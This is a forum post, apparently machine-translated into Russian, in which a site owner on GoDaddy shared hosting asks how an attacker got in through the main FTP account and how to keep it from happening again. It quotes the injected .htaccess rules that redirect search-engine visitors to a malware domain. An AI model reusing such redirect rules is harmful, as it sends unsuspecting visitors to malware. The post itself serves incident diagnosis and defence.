Вскрытие атаки на веб-сайт через взломанную учетную запись FTP

Мой сайт был взломан, и на данный момент я знаю некоторые подробности, но я не понимаю, как именно это произошло и как предотвратить это в будущем. Мне нужна ваша помощь, чтобы попытаться проанализировать атаку, чтобы я мог предотвратить ее повторение. Это немного длинновато, но я хочу убедиться, что предоставил достаточно информации, чтобы помочь решить проблему.

Вот что случилось.

Несколько недель назад я получил письмо от моей хостинговой компании GoDaddy, в котором говорилось, что мой сайт использует слишком много ресурсов и что они ожидают, что виноват запрос MySQL. Рассматриваемый запрос был поисковым запросом, который содержал 5-6 терминов. Чем больше терминов вы искали, тем сложнее становился запрос. Нет проблем. Я исправил это, но в то же время GoDaddy также временно отключил мою учетную запись, и прошло около 3 дней, прежде чем все вернулось в норму.

После этого инцидента мой поисковый трафик резко упал, примерно на 90%. Это отстой, кстати, я ничего об этом не подумал, списав это на фиаско запроса и полагая, что он вернется со временем, когда Google повторно просканирует сайт. Это не так.

Несколько дней назад я получил письмо от пользователя о том, что на моем сайте размещено вредоносное ПО. Я загрузил сайт прямо в свой браузер, но не увидел ничего, добавленного на страницу. Затем я проверил свой файл .htaccess и обнаружил следующее:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=584 [R,L]
</IfModule>

Милый. И немного хитроумно. Переход непосредственно к сайту из адресной строки или закладки, что я обычно делаю, загрузит сайт как обычно. Я редко перехожу на свой сайт по ссылке из поисковой системы, поэтому взлом так долго оставался незамеченным. Вредоносная программа также не размещалась непосредственно на моем сайте.

Быстрый поиск показал, что у других людей тоже была такая же проблема, хотя я подозреваю, что гораздо больше людей просто еще не обнаружили ее. Большинство рекомендаций заключалось в обновлении программного обеспечения до последних версий, изменении паролей и т. Д.

Поскольку я использую свою собственную систему управления контентом, а не вездесущий Wordpress, я копнул немного глубже. Я просканировал все свои файлы на предмет общих функций, используемых в эксплойтах PHP: base64_decode, exec, shell и т. Д. Ничего подозрительного не обнаружилось, и никаких дополнительных файлов не было.

Затем я проверил историю файлового менеджера GoDaddy и обнаружил, что файл .htaccess был изменен точно в тот же день, когда мой поисковый запрос был обвинен в использовании слишком большого количества ресурсов сервера. Это могло быть досадным совпадением, но я не совсем уверен. Перенаправление в файле .htaccess не кажется ресурсоемким, а запрос был достаточно сложным, чтобы потребовать много ресурсов.

Я хотел убедиться, что проблема не в моем коде, поэтому я проверил журналы трафика на предмет подозрительной активности примерно в то время, когда файл .htaccess был изменен, но не обнаружил никаких действий GET или POST, которые выглядели бы аномальными или похожими на попытка взлома.

Наконец, я запросил журналы FTP у GoDaddy и обнаружил, что во время изменения файла .htaccess был неавторизованный доступ к FTP. В то время я был в отпуске, мой компьютер был физически выключен, и у меня нет никого с учетными данными. Похоже, что тот, кто использовал FTP, использовал основного пользователя FTP для учетной записи, но с IP-адресом 91.220.0.19, который выглядит так, как будто он из Латвия.

На виртуальном хостинге GoDaddy автоматически назначает основное имя пользователя FTP на основе URL-адреса сайта. Это чрезвычайно предсказуемо, по крайней мере, так было, когда я создавал свою учетную запись хостинга. Я впервые зарегистрировал учетную запись хостинга несколько лет назад, поэтому она могла измениться, но, насколько я помню, я не мог выбрать основное имя пользователя FTP. В настоящее время вы также не можете изменить имя пользователя, и похоже, что GoDaddy не может этого сделать, если вы не отмените свою учетную запись и не уйдете. Хотя вы можете создавать, удалять и редактировать других пользователей FTP, основного пользователя FTP удалить нельзя. Изменить можно только пароль.

За исключением основного имени пользователя FTP, все учетные данные для доступа к сайту, базе данных, администратору и учетной записи представляют собой тарабарщину, случайные имена пользователей и пароли, которые выглядят так, как будто ваша кошка шла по клавиатуре. Пример: lkSADf32! $ AsJd3.

Я тщательно просканировал свой компьютер на наличие вирусов, вредоносных программ и т. Д. На случай, если это слабое место в ссылке, но вообще ничего не обнаружилось. Я использую брандмауэр, антивирусную программу и стараюсь использовать безопасные привычки просмотра.

Когда я обновляю свой сайт, я использую Core FTP LE и соединение SSH / SFTP. Учетная запись хостинга - это установка Linux.

Во время разговора со службой технической поддержки GoDaddy они не понимают, как был взломан пароль FTP. На виртуальном хостинге они не могут установить блокировку IP-адресов на уровне пользователя FTP. Они также не могут изменить основное имя пользователя FTP. Когда я спросил, есть ли у них защита от перебора по FTP, специалисты поначалу казались неуверенными, но потом сказали, что есть, после того, как я несколько раз перефразировал. Тем не менее, я помню, что задавал тот же вопрос во время предыдущего звонка и слышал, что GoDaddy не имеет защиты от грубой силы при доступе к FTP. На данный момент я не знаю, есть они или нет.

Я изменил все свои учетные данные для доступа по всем направлениям, а также заблокировал латвийский IP-адрес с помощью файла .htaccess (вероятно, не будет иметь значения, если они используют FTP), но я все еще не уверен, как FTP пароль был взломан с самого начала.

Я почти уверен, что проблема была не в моем коде (даже если бы это было так, информация FTP не должна была быть раскрыта) или в моем компьютере. Я подозреваю, но не знаю, как доказать, что пароль FTP был взломан методом перебора, поскольку имя пользователя было предсказуемым. Атака методом грубой силы также могла совпадать с исчерпанием ресурсов сервера (обвинение в моем запросе), но я недостаточно знаю техническую сторону серверов, чтобы знать, возможно ли это или даже вероятно.

Теперь я чувствую, что знаю, что делать, в конце. Я хотел бы иметь возможность понять, как была проведена атака и как ее предотвратить, поэтому, если у вас есть какие-либо дополнительные идеи о векторах атаки, диагностике, которую можно запустить, или дополнительных мерах безопасности, я был бы очень благодарен. Я более чем готов сменить хоста или отказаться от виртуального хостинга, но я хочу убедиться, что смогу предотвратить повторение этого снова.

Помогите мне, Оби-Ван Кеноби ...